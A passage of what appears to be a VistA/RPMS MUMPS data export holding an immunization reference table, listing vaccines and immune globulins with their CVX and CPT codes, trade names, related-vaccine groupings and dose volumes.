Recombivax HB pediatric formul^^Engerix-B pediatric/adolescent^^^^^^^^^^^Hepatitis B vaccine, pediatric or pediatric/adolescent dosage
"DATA",9002084.94,139,0)
POLIO, NOS^POLIO,NOS^89^^^^1^^2^^^^^V04.0^99.41^0^1^.5
"DATA",9002084.94,139,1)
^^^^^^^^^^^^^Polio, NOS
"DATA",9002084.94,140,0)
LYME DISEASE^LYME^66^^^^1^^12^^90665^^^V03.89^99.59^1^1^.5
"DATA",9002084.94,140,1)
LYMErix^^^^^^^^^^^^^Lyme Disease Vaccine
"DATA",9002084.94,141,0)
RSV-MAB^RSV-MAb^93^^^^0^^12^SYNAGIS^90378^71,93,145^^V07.2^99.14^0^1
"DATA",9002084.94,141,1)
Synagis^^^^^^^^^^^^^Respiratory Syncytial virus monoclanal antibody (palivizumab), intramuscular
"DATA",9002084.94,142,0)
Pneumococcal, PCV-7^PCV-7^100^^6^^1^^11^PCV7^90669^33,100,109,133^^V03.82^99.55^0^1^.5
"DATA",9002084.94,142,1)
Prevnar 7^^PREVNAR 7^^^^^^^^^^^pneumococcal conjugate vaccine, 7 valent
"DATA",9002084.94,143,0)
MENINGOCOCCAL C CONJUGATE^MEN-C CONJ^103^^^^1^^16^^^32,103,108,114,136,147,148^^V03.89^99.59^0^1^.5
"DATA",9002084.94,143,1)
^^^^^^^^^^^^^Meningococcal C conjugate vaccine
"DATA",9002084.94,144,0)
HEP B,ADULT^HEP B ADLT^43^^6^^0^^4^^90746^8,42,44,45,104^3120202^V05.3^99.59^0^1^1
"DATA",9002084.94,144,1)
Recombivax HB adult formulatio^^Heptavax-B^^Engerix-B adult dose^^^^^^^^^Hepatitis B vaccine, adult dosage^90743
"DATA",9002084.94,145,0)
PERTUSSIS^PERTUSSIS^11^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,145,1)
^^^^^^^^^^^^^Pertussis
"DATA",9002084.94,146,0)
DIPHTHERIA ANTITOXIN^DIPHTHERIA^12^^^^1^^^^90296^^^^^0^1^.5
"DATA",9002084.94,146,1)
Diphtheria antitoxin^^^^^^^^^^^^^Diphtheria antitoxin
"DATA",9002084.94,147,0)
TIG^TIG^13^^^^0^^^^90389^^^^^0^1
"DATA",9002084.94,147,1)
^^^^^^^^^^^^^Tetanus immune globulin
"DATA",9002084.94,148,0)
INFLUENZA, SPLIT [TIVhx] (INCL PURIFIED)^FLU-TIVhx^15^^^^1^^10^^90657^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^^^^0^1^.5
"DATA",9002084.94,148,1)
^^^^^^^^^^^^^Influenza virus vaccine, split virus (incl. Purified surface antigen)^90658
"DATA",9002084.94,149,0)
INFLUENZA, WHOLE^FLU-WHOLE^16^^^^1^^10^^90659^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^^^^0^1^.5
"DATA",9002084.94,149,1)
^^^^^^^^^^^^^Influenza virus vaccine, whole virus
"DATA",9002084.94,150,0)
RABIES, INTRAMUSCULAR INJECTION^RABIES,IM^18^^^^0^^^^90675^^3091006^^^0^1^.5
"DATA",9002084.94,150,1)
RabAvert^^Imovax Rabies^^Rabies Vaccine Absorbed^^^^^^^^^Rabies vaccine - for intramuscular injection
"DATA",9002084.94,151,0)
DTP-HIB^DTP-HIB^22^^^^1^^14^^90720^^^^^0^1^.5^^^103^126
"DATA",9002084.94,151,1)
ActHIB/DTP^^Tetramune^^^^^^^^^^^DTP-Haemophilus influenza type b conjugate vaccine
"DATA",9002084.94,152,0)
PLAGUE^PLAGUE^23^^^^1^^^^90727^^^^^0^0^.5
"DATA",9002084.94,152,1)
^^^^^^^^^^^^^Plague
"DATA",9002084.94,153,0)
ANTHRAX^ANTHRAX^24^^^^1^^^^90581^^3100310^^^0^1^.5
"DATA",9002084.94,153,1)
Biothrax^^^^^^^^^^^^^Anthrax vaccine
"DATA",9002084.94,154,0)
TYPHOID, ORAL^TYPHOID,OR^25^^^^0^^^^90690^^3120529^^^0^1^.5
"DATA",9002084.94,154,1)
Vivotif Berna^^^^^^^^^^^^^Typhoid vaccine, live, oral
"DATA",9002084.94,155,0)
BOTULINUM ANTITOXIN^BOTULINUM^27^^^^1^^^^90287^^^^^0^1^.5
"DATA",9002084.94,155,1)
Botox^^^^^^^^^^^^^Botulinum antitoxin
"DATA",9002084.94,156,0)
CMVIG^CMVIG^29^^^^0^^^^90291^^^^^0^1^.5
"DATA",9002084.94,156,1)
CytoGam^^^^^^^^^^^^^Cytomegalovirus immune globulin, intravenous
"DATA",9002084.94,157,0)
HEP A, PEDIATRIC, NOS^HEP AP,NOS^31^^^^1^^9^^^83,84,85,52,104^^^^0^1^.5
"DATA",9002084.94,157,1)
^^^^^^^^^^^^^Hepatitis A vaccine, pediatric dosage NOS
"DATA",9002084.94,158,0)
RIG^RIG^34^^^^0^^^^90376^^^^^0^0^.5
"DATA",9002084.94,158,1)
BayRab^^IMOGRAM RABIES - HT^^^^^^^^^^^Rabies immune globulin^90375
"DATA",9002084.94,159,0)
VZIG^VZIG^36^^^^0^^^^90396^117^^^^0^0
"DATA",9002084.94,159,1)
^^^^^^^^^^^^^Varicella zoster immune globulin
"DATA",9002084.94,160,0)
RUBELLA/MUMPS^RUBELLA/MU^38^^^^1^^^^^6,3,4,94^^^^0^0^.5
"DATA",9002084.94,160,1)
BIAVAX II^^^^^^^^^^^^^Rubella and Mumps virus vaccine
"DATA",9002084.94,161,0)
JAPANESE ENCEPHALITIS^JAPANESE E^39^^^^1^^^^90735^^3140124^^^0^1^.5
"DATA",9002084.94,161,1)
JE-VAX^^^^^^^^^^^^^Japanese Encephalitis virus vaccine
"DATA",9002084.94,162,0)
RABIES, INTRADERMAL INJECTION^RABIES,ID^40^^^^0^^^^90676^^3091006^^^0^1^.5
"DATA",9002084.94,162,1)
Imovax Rabies I.D.^^^^^^^^^^^^^Rabies vaccine, for intradermal injection
"DATA",9002084.94,163,0)
TYPHOID, PARENTERAL^TYPHOID,PA^41^^^^1^^^^90692^^3120529^^^0^1^.5
"DATA",9002084.94,163,1)
Typhim Vi^^^^^^^^^^^^^Typhoid vaccine, Parenteral; other than acetone killed, dried
"DATA",9002084.94,164,0)
HEP B, ADOLESCENT/HIGH RISK INFA^HEP B ADOL^42^^^^1^^4^^90745^43,44,45,8,104^3120202^^^0^1^.5
"DATA",9002084.94,164,1)
Recombivax HB adolescent/high-^^^^^^^^^^^^^Hepatitis B vaccine, adolescent/high risk infant dosage
"DATA",9002084.94,165,0)
HEP B, DIALYSIS^HEP B DIAL^44^^^^1^^4^^90740^8,43,45,42,104^3120202^^^0^1^1
"DATA",9002084.94,165,1)
^^^^^^^^^^^^^Hepatitis B vaccine, dialysis patient dosage^90747
"DATA",9002084.94,166,0)
DTAP-HIB^DTAP-HIB^50^^^^1^^14^^90721^20,106,107,110,46,47,48,49,17,51,120^3141022^^^0^1^.5^^^133^136
"DATA",9002084.94,166,1)
TriHIBit^^^^^^^^^^^^^DTaP-Haemophilus influenza type b conjugate vaccine
"DATA",9002084.94,167,0)
HIB-HEP B^COMVAX^51^^^^0^^14^^90748^46,47,48,8,42,43,44,45,49,17^3141022^^^0^1^.5^^^138^127
"DATA",9002084.94,167,1)
Comvax^^^^^^^^^^^^^Haemophilus influenza type b vaccine conjugate and Hepatitis B vaccine
"DATA",9002084.94,168,0)
HEP A, ADULT^HEP A ADLT^52^^^^0^^9^^90632^83,84,31,104,85^3111025^^^0^1^1
"DATA",9002084.94,168,1)
VAQTA adult formulation^^Havrix 1440 ELU/1 mL^^^^^^^^^^^Hepatitis A vaccine, adult dosage
"DATA",9002084.94,169,0)
TYPHOID, PARENTERAL, AKD (U.S. M^TYPHOID,PM^53^^^^1^^^^90693^^3120529^^^0^1^.5
"DATA",9002084.94,169,1)
^^^^^^^^^^^^^Typhoid vaccine, Parenteral; acetone killed, dried (U.S. military)
"DATA",9002084.94,170,0)
ADENOVIRUS, TYPE 4^ADENOVI,T4^54^^^^1^^^^90476^54,55,82,143^^^^0^0^.5
"DATA",9002084.94,170,1)
^^^^^^^^^^^^^Adenovirus vaccine, type 4, live, oral
"DATA",9002084.94,171,0)
ADENOVIRUS, TYPE 7^ADENOVI,T7^55^^^^1^^^^90477^54,55,82,143^^^^0^0^.5
"DATA",9002084.94,171,1)
^^^^^^^^^^^^^Adenovirus vaccine, type 7, live, oral
"DATA",9002084.94,172,0)
DENGUE FEVER^DENGUE FEV^56^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,172,1)
^^^^^^^^^^^^^Dengue fever vaccine
"DATA",9002084.94,173,0)
HANTAVIRUS^HANTAVIRUS^57^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,173,1)
^^^^^^^^^^^^^Hantavirus vaccine
"DATA",9002084.94,174,0)
HEP C^HEP C^58^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,174,1)
^^^^^^^^^^^^^Hepatitis C vaccine
"DATA",9002084.94,175,0)
HEP E^HEP E^59^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,175,1)
^^^^^^^^^^^^^Hepatitis E vaccine
"DATA",9002084.94,176,0)
HERPES SIMPLEX 2^HERPES SIM^60^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,176,1)
^^^^^^^^^^^^^Herpes simples virus, type 2 vaccine
"DATA",9002084.94,177,0)
HIV^HIV^61^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,177,1)
^^^^^^^^^^^^^Human immunodeficiency virus vaccine
"DATA",9002084.94,178,0)
HPV QUADRIVALENT^HPV-4^62^^^^0^^17^^90649^62,118,137^3130517^^^0^1^.5
"DATA",9002084.94,178,1)
Gardasil^^^^^^^^^^^^^Human papilloma virus vaccine
"DATA",9002084.94,179,0)
JUNIN VIRUS^JUNIN VIRU^63^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,179,1)
^^^^^^^^^^^^^Junin virus vaccine
"DATA",9002084.94,180,0)
LEISHMANIASIS^LEISHMANIA^64^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,180,1)
^^^^^^^^^^^^^Leishmaniasis vaccine
"DATA",9002084.94,181,0)
LEPROSY^LEPROSY^65^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,181,1)
^^^^^^^^^^^^^Leprosy vaccine
"DATA",9002084.94,182,0)
MALARIA^MALARIA^67^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,182,1)
^^^^^^^^^^^^^Malaria vaccine
"DATA",9002084.94,183,0)
MELANOMA^MELANOMA^68^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,183,1)
^^^^^^^^^^^^^Melanoma vaccine
"DATA",9002084.94,184,0)
PARAINFLUENZA-3^PARAINFLUE^69^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,184,1)
^^^^^^^^^^^^^Parinfluenza - 3 virus vaccine
"DATA",9002084.94,185,0)
Q FEVER^Q FEVER^70^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,185,1)
^^^^^^^^^^^^^Q Fever vaccine
"DATA",9002084.94,186,0)
RSV-IGIV ^RSV-IGIV ^71^^^^1^^^^90379^71,93,145^^^^0^1
"DATA",9002084.94,186,1)
RespiGam^^^^^^^^^^^^^Respiratory Syncytial virus immune globulin, intravenous
"DATA",9002084.94,187,0)
RHEUMATIC FEVER^RHEUMATIC ^72^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,187,1)
^^^^^^^^^^^^^Rheumatic fever vaccine
"DATA",9002084.94,188,0)
RIFT VALLEY FEVER^RIFT VALLE^73^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,188,1)
^^^^^^^^^^^^^Rift Valley Fever vaccine
"DATA",9002084.94,189,0)
STAPHYLOCOCCUS BACTERIO LYSATE^STAPHYLOCO^76^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,189,1)
^^^^^^^^^^^^^Staphylococcus Bacterophage lysate
"DATA",9002084.94,190,0)
TICK-BORNE ENCEPHALITIS^TICK-BORNE^77^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,190,1)
^^^^^^^^^^^^^Tick-borne enchephalitis vaccine
"DATA",9002084.94,191,0)
TULAREMIA VACCINE^TULAREMIA ^78^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,191,1)
^^^^^^^^^^^^^Tularemia vaccine
"DATA",9002084.94,192,0)
VACCINIA IMMUNE GLOBULIN^VACCINIA I^79^^^^1^^^^90393^^3070831^^^0^0^.5
"DATA",9002084.94,192,1)
^^^^^^^^^^^^^Vaccinia immune globulin
"DATA",9002084.94,193,0)
VEE, LIVE^VEE, LIVE^80^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,193,1)
^^^^^^^^^^^^^Venezuelan equine enchapahlitis vaccine, live, attenuated
"DATA",9002084.94,194,0)
VEE, INACTIVATED^VEE, INACT^81^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,194,1)
^^^^^^^^^^^^^Venezuelan equine enchapahlitis vaccine, inactivated
"DATA",9002084.94,195,0)
ADENOVIRUS, NOS^ADENOV,NOS^82^^^^1^^^^^54,55,82,143^^^^0^0^.5
"DATA",9002084.94,195,1)
^^^^^^^^^^^^^Adenovirus vaccine, NOS
"DATA",9002084.94,196,0)
HEP A, PED/ADOL, 2 DOSE^HEP A PED^83^^^^0^^9^^90633^52,84,31,85,104^3111025^^^0^1^.5
"DATA",9002084.94,196,1)
VAQTA pediatric/adolescent for^^Havrix 720 ELU/0.5 mL^^^^^^^^^^^Hepatitis A vaccine, pediatric/adolescent dosage, 2 dose schedule
"DATA",9002084.94,197,0)
HEP A, PED/ADOL, 3 DOSE^HEP A 3PED^84^^^^1^^9^^90634^52,83,31,85,104^^^^0^1^.5
"DATA",9002084.94,197,1)
Havrix 360 ELU/0.5 mL^^^^^^^^^^^^^Hepatitis A vaccine, pediatric/adolescent dosage, 3 dose schedule
"DATA",9002084.94,198,0)
IG^IG^86^^^^0^^^^90281^^^^^0^0
"DATA",9002084.94,198,1)
^^^^^^^^^^^^^Immune globulin, intramuscular
"DATA",9002084.94,199,0)
IGIV^IGIV^87^^^^0^^^^90283^^^^^0^0
"DATA",9002084.94,199,1)
Gammar-P IV^^Venoglobulin-S^^^^^^^^^^^Immune globulin, intravenous
"DATA",9002084.94,200,0)
VEE, NOS^VEE,NOS^92^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,200,1)
^^^^^^^^^^^^^Venezuelan equine enchapahlitis vaccine, NOS
"DATA",9002084.94,201,0)
MMRV^MMRV^94^^^^0^^14^^90710^3,4,5,6,7,21,38,121^3100521^^^0^1^.5^^^117^132
"DATA",9002084.94,201,1)
Pro-Quad^^^^^^^^^^^^^Measles, Mumps, Rubella, and Varicella virus vaccine
"DATA",9002084.94,202,0)
TST-OT TINE TEST^TST-OT TIN^95^^^^1^1^13^^^^^^^0^0^.5
"DATA",9002084.94,202,1)
^^^^^^^^^^^^^Tuberculin skin test; old tuberculin, multipuncture device
"DATA",9002084.94,203,0)
TST-PPD INTRADERMAL^TST-PPD^96^^^^1^1^13^^^^^^^0^0^.5
"DATA",9002084.94,203,1)
PPD^^^^^^^^^^^^^Tuberculin skin test; purified protein derivative, intradermal
"DATA",9002084.94,204,0)
TST-PPD TINE TEST^TST-PPD TI^97^^^^1^1^13^^^^^^^0^0^.5
"DATA",9002084.94,204,1)
^^^^^^^^^^^^^Tuberculin skin test; purified proten derivative, multipuncture device
"DATA",9002084.94,205,0)
TST, NOS^TST,NOS^98^^^^1^1^13^^^^^^^0^0^.5
"DATA",9002084.94,205,1)
^^^^^^^^^^^^^Tuberculin skin test; NOS
"DATA",9002084.94,206,0)
RESERVED - DO NOT USE3^RESERVED -^99^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,206,1)
^^^^^^^^^^^^^RESERVED -do not use
"DATA",9002084.94,207,0)
TYPHOID, VICPS^TYPHOID,VI^101^^^^1^^^^90691^^3120529^^^0^1^.5
"DATA",9002084.94,207,1)
^^^^^^^^^^^^^Typhoid Vi capsular polysaccharide vaccine
"DATA",9002084.94,208,0)
DTP-HIB-HEP B^DTP-HIB-HE^102^^^^1^^14^^^^3080918^^^0^0^.5^^^103^136^138
"DATA",9002084.94,208,1)
^^^^^^^^^^^^^DTP-Haemophilus influenzae type b conjugate and hepatitis b vaccine
"DATA",9002084.94,209,0)
HEP A-HEP B^TWINRIX^104^^^^0^^14^^90636^52,83,84,31,85,8,42,43,44,45,51,110^3120202^^^0^1^1^^^144^168
"DATA",9002084.94,209,1)
Twinrix^^^^^^^^^^^^^Hepatitis A and hepatitis B vaccine
"DATA",9002084.94,210,0)
SMALLPOX, DILUTED^SMALLPOX,D^105^^^^1^^^^^^3070831^^^0^1^.5
"DATA",9002084.94,210,1)
^^^^^^^^^^^^^Smallpox vaccine, diluted
"DATA",9002084.94,211,0)
DTAP, 5 PERTUSSIS ANTIGENS^DTAP,5PE^106^^^^1^^1^^90700^20,107,110,50^3141022^^^0^1^.5
"DATA",9002084.94,211,1)
Daptacel^^^^^^^^^^^^^Diphtheria, tetanus toxoids and acellular pertussis vaccine, 5 pertussis antigens
"DATA",9002084.94,212,0)
DTAP, NOS^DTAP,NOS^107^^^^1^^1^^^20,106,110,50^^^^0^1^.5
"DATA",9002084.94,212,1)
^^^^^^^^^^^^^Diphtheria, tetanus toxoids and acellular pertussis vaccine, NOS
"DATA",9002084.94,213,0)
MENINGOCOCCAL, NOS^MENING,NOS^108^^^^1^^16^^^32,103,108,114,136,147,148^^^^0^1^.5
"DATA",9002084.94,213,1)
^^^^^^^^^^^^^Meningococcal vaccine, NOS
"DATA",9002084.94,214,0)
PNEUMOCOCCAL, NOS^PNEUMO,NOS^109^^^^1^^11^^^33,100,109,133^^^^0^1^.5
"DATA",9002084.94,214,1)
^^^^^^^^^^^^^Pneumococcal vaccine, NOS
"DATA",9002084.94,215,0)
NO VACCINE ADMINISTERED^NO VACCINE^998^^^^1^^^^^^^^^0^0^.5
"DATA",9002084.94,215,1)
^^^^^^^^^^^^^No vaccine administered
"DATA",9002084.94,216,0)
DTaP-Hep B-IPV^PEDIARIX^110^^^^0^^14^^90723^1,22,28,102,43,44,45,10,106,107,50,8,42,20^3141022^^^0^1^.5^^^138^107^133
"DATA",9002084.94,216,1)
Pediarix^^^^^^^^^^^^^DTap- hepatitis B and poliovirus vaccine
"DATA",9002084.94,217,0)
INFLUENZA, Intranasal, Trivalent^FLU-LAIV3^111^^^^1^0^10^^90660^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3120702^^^0^1^.2
"DATA",9002084.94,217,1)
FluMist^^^^^^^^^^^^^Influenza virus vaccine, live, attenuated, for intranasal use
"DATA",9002084.94,218,0)
TETANUS TOXOID, NOS^TETTOX,NOS^112^^^^1^^1^^^9,28,35,112,113,115,138,139,142^^^^^1^.5
"DATA",9002084.94,218,1)
^^^^^^^^^^^^^TETANUS TOXOID, NOS
"DATA",9002084.94,219,0)
TD (ADULT) PRESERVATIVE FREE^Td-ADULTpf^113^^^^0^^8^^90714^9,28,35,112,113,115,138,139,142^3140204^^^0^1^.5
"DATA",9002084.94,219,1)
^^^^^^^^^^^^^TD (ADULT) PRESERVATIVE FREE
"DATA",9002084.94,220,0)
MENINGOCOCCAL A,C,Y,W-135 DIPHTHERIA CONJ^MENING-CV4^114^^^^0^^16^^90734^32,103,108,114,136,147,148^3111014^^^^1^.5
"DATA",9002084.94,220,1)
Menactra^^^^^^^^^^^^^MENINGOCOCCAL POLYSACCHARIDE (groups A, C, Y and W-135) diphtheria toxoid conj
"DATA",9002084.94,221,0)
Tdap^Tdap^115^^^^0^^8^^90715^9,28,35,112,113,115,138,139,142^3130519^V06.1^^^1^.5
"DATA",9002084.94,221,1)
Boostrix^^Adacel^^^^^^^^^^^TETANUS TOXOID, REDUCED DIPHTHERIA, ACELL PERTUSSIS VACCINE, ABSORBED
"DATA",9002084.94,222,0)
ROTAVIRUS, PENTAVALENT^ROTA-5^116^^^^0^0^15^^90680^74,119,122^3130826^V04.89^^^1^2
"DATA",9002084.94,222,1)
Rotateq^^^^^^^^^^^^^rotavirus, live, pentavalent vaccine
"DATA",9002084.94,223,0)
VZIG-IND^VZIG-IND^117^^^^1^0^7^^^36^^^^^1
"DATA",9002084.94,223,1)
^^^^^^^^^^^^^varicella zoster immune globulin (Investigational New Drug)
"DATA",9002084.94,224,0)
HPV, bivalent^HPV-2^118^^^^0^0^17^^90650^62,118,137^3110503^^^^1^.5
"DATA",9002084.94,224,1)
Cervarix^^^^^^^^^^^^^human papilloma virus vaccine, bivalent
"DATA",9002084.94,225,0)
ROTAVIRUS, MONOVALENT^ROTA-1^119^^^^0^0^15^^90681^74,116,122^3130826^V04.89^^^1
"DATA",9002084.94,225,1)
Rotarix^^^^^^^^^^^^^rotavirus, live, monovalent vaccine
"DATA",9002084.94,226,0)
DTaP-Hib-IPV^PENTACEL^120^^^^1^0^14^^90698^01,10,17,20,22,46,47,48,49,50,51,102,106,107,110,120^3141022^^^^1^.5^^^133^136^107
"DATA",9002084.94,226,1)
^^^^^^^^^^^^^DTaP-Hib-IPV
"DATA",9002084.94,227,0)
ZOSTER^ZOSTER^121^^^^0^0^7^^90736^21,94,117^3091006^^^^^.65
"DATA",9002084.94,227,1)
Zostavax^^^^^^^^^^^^^zoster vaccine, live
"DATA",9002084.94,228,0)
ROTAVIRUS, NOS^ROTA,NOS^122^^^^1^0^15^^^74,116,119^^^^^1
"DATA",9002084.94,228,1)
^^^^^^^^^^^^^rotavirus vaccine, NOS
"DATA",9002084.94,229,0)
INFLUENZA, H5N1^FLU-H5N1^123^^^^1^^10^^^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^^^^0^0
"DATA",9002084.94,229,1)
^^^^^^^^^^^^^Influenza virus vaccine, H5N1, A/Vietnam/1203/2004 (national stockpile)
"DATA",9002084.94,230,0)
DTaP-IPV^KINRIX^130^^^^0^0^14^^90696^10,110,20,50,106,107^3141022^^^^1^.5^^^133^107
"DATA",9002084.94,230,1)
Kinrix^^^^^^^^^^^^^Diphtheria, tetanus toxoids and acellular pertussis, and poliovirus, inactivated
"DATA",9002084.94,231,0)
Novel Influenza-H1N1-09, Nasal^H1N1-NASAL^125^^^^1^0^18^SWINEFLU^^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3091001^^^0^1^.2
"DATA",9002084.94,231,1)
^^^^^^^^^^^^^Novel Influenza-H1N1-09, live virus for nasal administration
"DATA",9002084.94,232,0)
Novel influenza-H1N1-09, preservative-free^H1N1-pfree^126^^^^1^0^18^^^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3091001^^^0^1
"DATA",9002084.94,232,1)
^^^^^^^^^^^^^Novel influenza-H1N1-09, preservative-free, injectable
"DATA",9002084.94,233,0)
Novel influenza-H1N1-09^H1N1^127^^^^1^0^18^^^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3091001^^^0^1^.5
"DATA",9002084.94,233,1)
^^^^^^^^^^^^^Novel influenza-H1N1-09, injectable
"DATA",9002084.94,234,0)
Novel influenza-H1N1-09, all formulations^H1N1,NOS^128^^^^1^0^18^^90663^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^^^^0^1^.5
"DATA",9002084.94,234,1)
^^^^^^^^^^^^^Novel influenza-H1N1-09, all formulations^90470
"DATA",9002084.94,235,0)
Pneumococcal, PCV-13^PCV-13^133^^^^0^0^11^PCV13^90670^33,100,109,133^3141022^^^0^1^.5
"DATA",9002084.94,235,1)
Prevnar 13^^PREVNAR 13^^^^^^^^^^^pneumococcal conjugate vaccine, 13 valent
"DATA",9002084.94,236,0)
INFLUENZA, HIGH DOSE SEASONAL^FLU-HIGH^135^^^^0^0^10^^90662^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819^^^^1^.5
"DATA",9002084.94,236,1)
Fluzone High Dose^^^^^^^^^^^^^INFLUENZA, HIGH DOSE SEASONAL, PRESERVATIVE-FREE
"DATA",9002084.94,237,0)
Meningococcal MCV4O^MeningCV4O^136^^^^0^^16^^90734^32,103,108,114,136,147,148^3111014^^^0^1^.5
"DATA",9002084.94,237,1)
Menveo^^^^^^^^^^^^^meningococcal oligosaccharide (groups A, C, Y and W-135) diphtheria toxoid conj
"DATA",9002084.94,238,0)
DTaP-IPV-HIB-HEP B, historical^DTaPIPVHHb^132^^^^1^^14^^^^^^^^^^^^133^107^124^110
"DATA",9002084.94,238,1)
^^^^^^^^^^^^^DTaP-IPV-HIB-HEP B, historical
"DATA",9002084.94,239,0)
HPV,NOS^HPV,NOS^137^^^^1^0^17^^^62,118,137^^^^0^1^.5
"DATA",9002084.94,239,1)
^^^^^^^^^^^^^HPV, unspecified formulation
"DATA",9002084.94,240,0)
Japanese Encephalitis-IM^JAPAN E IM^134^^^^1^^12^^90738^^3140124
"DATA",9002084.94,240,1)
^^^^^^^^^^^^^Japanese Encephalitis vaccine for intramuscular administration.
"DATA",9002084.94,241,0)
Typhus, historical^TYPHUS,NOS^131^^^^1^^12
"DATA",9002084.94,241,1)
^^^^^^^^^^^^^Historical record of a typhus vaccination
"DATA",9002084.94,242,0)
Influenza, seasonal, injectable, preservative free, trivalent ^FLU-IIV3pf^140^^^^0^0^10^^90655^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3130726^^^0^1
"DATA",9002084.94,242,1)
Fluzone^^Fluvirin^^^^^^^^^^^INFLUENZA, SEASONAL INJ, PRES. FREE^90656
"DATA",9002084.94,243,0)
INFLUENZA [TIV], SEASONAL, INJ^FLU-IIV3^141^^^^0^0^10^^90657^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819^^^0^1^.5
"DATA",9002084.94,243,1)
Fluzone^^Fluvirin ^^^^^^^^^^^INFLUENZA, SEASONAL INJECTABLE^90658
"DATA",9002084.94,244,0)
Td-NA^Td-NA^138^^^^1^0^8^^^9,28,35,112,113,115,138,139,142^3140204^^^0^1^.5
"DATA",9002084.94,244,1)
^^^^^^^^^^^^^tetanus and diphtheria toxoids, not adsorbed, for adult use
"DATA",9002084.94,245,0)
Td,NOS^Td,NOS^139^^^^1^0^8^^^9,28,35,112,113,115,138,139,142^3140204^^^0^1^.5
"DATA",9002084.94,245,1)
^^^^^^^^^^^^^Td(adult) unspecified formulation
"DATA",9002084.94,246,0)
TET TOX,NA^TET TOX,NA^142^^^^1^0^8^^^9,28,35,112,113,115,138,139,142^3140204^^^0^1
"DATA",9002084.94,246,1)
^^^^^^^^^^^^^tetanus toxoid, not adsorbed
"DATA",9002084.94,247,0)
ADENOVIRUS, TYPES 4&7^ADENO,oral^143^^^^1^0^12^^^54,55,82,143^^^^0^1
"DATA",9002084.94,247,1)
^^^^^^^^^^^^^Adenovirus, type 4 and type 7, live, oral
"DATA",9002084.94,248,0)
INFLUENZA, INTRADERMAL^FLU-DERMAL^144^^^^0^0^10^^90654^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819^^^0^1^.1
"DATA",9002084.94,248,1)
Fluzone Intradermal^^^^^^^^^^^^^seasonal influenza, intradermal, preservative free
"DATA",9002084.94,249,0)
RSV-MAb,M^RSV-MAb,M^145^^^^1^0^12^^^71,93,145^^^^0^1
"DATA",9002084.94,249,1)
Motavizumab^^^^^^^^^^^^^respiratory syncytial virus monoclonal antibody (motavizumab), intramuscular
"DATA",9002084.94,250,0)
DTaP,IPV,Hib,HepB^DTaPPVHHb^146^^^^1^0^12
"DATA",9002084.94,250,1)
^^^^^^^^^^^^^Diphtheria, Tetanus, Acell Pertussis Absorbed, Inactiv Polio, HIB Conj, Hep B
"DATA",9002084.94,251,0)
Meningococcal MCV4, unspecified form^MenCV4-NOS^147^^^^1^0^16^^^32,103,108,114,136,147,148^3111014^^^^1^.5
"DATA",9002084.94,251,1)
^^^^^^^^^^^^^Meningococcal, MCV4, unspecified formulation(groups A, C, Y and W-135)
"DATA",9002084.94,252,0)
Meningococcal C/Y-HIB PRP^MenCY-Hib^148^^^^1^0^14^^90644^32,103,108,114,136,147,148^^^^0^1^.5^^^136^213
"DATA",9002084.94,252,1)
MenHibrix^^^^^^^^^^^^^Meningococcal Groups C and Y and Haemophilus b Tetanus Toxoid Conjugate Vaccine
"DATA",9002084.94,253,0)
INFLUENZA, Live, Intranasal, Quadrivalent^FLU-LAIV4^149^^^^0^0^10^^90672^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819^^^0^1^.2
"DATA",9002084.94,253,1)
FluMist^^^^^^^^^^^^^Influenza, Live, Intranasal, Quadrivalent
"DATA",9002084.94,254,0)
INFLUENZA, INJECTABLE, QUAD, PF^FLU-IIV4pf^150^^^^1^0^10^^90685^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819^^^^1
"DATA",9002084.94,254,1)
^^^^^^^^^^^^^Influenza, injectable, quadrivalent, preservative free^90686
"DATA",9002084.94,255,0)
INFLUENZA NASAL, UNSPECIFIED^FLU-NasNOS^151^^^^1^0^10^^^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161
"DATA",9002084.94,255,1)
FluMist^^^^^^^^^^^^^influenza nasal, unspecified formulation
"DATA",9002084.94,256,0)
Pneumococcal, Unspecified^PCV-NOS^152^^^^1^0^11
"DATA",9002084.94,256,1)
^^^^^^^^^^^^^Pneumococcal Conjugate, unspecified formulation
"DATA",9002084.94,257,0)
